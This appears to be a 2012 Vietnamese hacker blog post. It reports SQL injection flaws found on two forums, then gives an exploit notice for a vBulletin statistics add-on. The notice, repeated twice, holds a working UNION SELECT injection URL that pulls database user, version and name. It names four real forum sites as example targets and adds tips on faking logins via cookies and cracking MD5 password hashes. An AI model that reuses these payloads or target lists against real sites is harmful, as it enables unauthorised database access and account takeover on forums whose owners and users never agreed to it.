Thursday, October 25, 2012

[Check] VietSource.Net

 http://i942.photobucket.com/albums/ad269/juno_okyo/Upload%20via%20Firefox/VietSource.png
 http://i942.photobucket.com/albums/ad269/juno_okyo/Upload%20via%20Firefox/VietSource-1.png
  • Site: http://vietsource.net/forum/
  • Lỗi phát hiện: SQL injection.
  • Đánh giá: Nghiêm trọng.
  • Khai thác: Truy vấn SQL lấy thông tin...
  • Tình trạng: Đã liên hệ Admin => Fixed.

[Check] Skinvbb.net

http://i942.photobucket.com/albums/ad269/juno_okyo/Upload%20via%20Firefox/skinvbb.png 

  • Site: http://skinvbb.net
  • Exploit: SQL injection
  • Đánh giá: nguy hiểm.
  • Khai thác: Truy vấn SQL lấy thông tin...
  • Tình trạng: Đã liên hệ Admin => Fixed.

ChangUonDyU - Advanced Statistics SQL injection Vulnerability

    #####################################################################################################
->Vulnerability
#####################################################################################################

->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################

->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,

user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager to fake login.
[+] Md5 Hash Generator -> http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno_okyo & all VNH Group members.

##########################################################################################


ChangUonDyU - Advanced Statistics SQL injection Vulnerability

    #####################################################################################################
->Vulnerability
#####################################################################################################

->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################

->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,

user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager to fake login.
[+] Md5 Hash Generator -> http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno_okyo & all VNH Group members.

##########################################################################################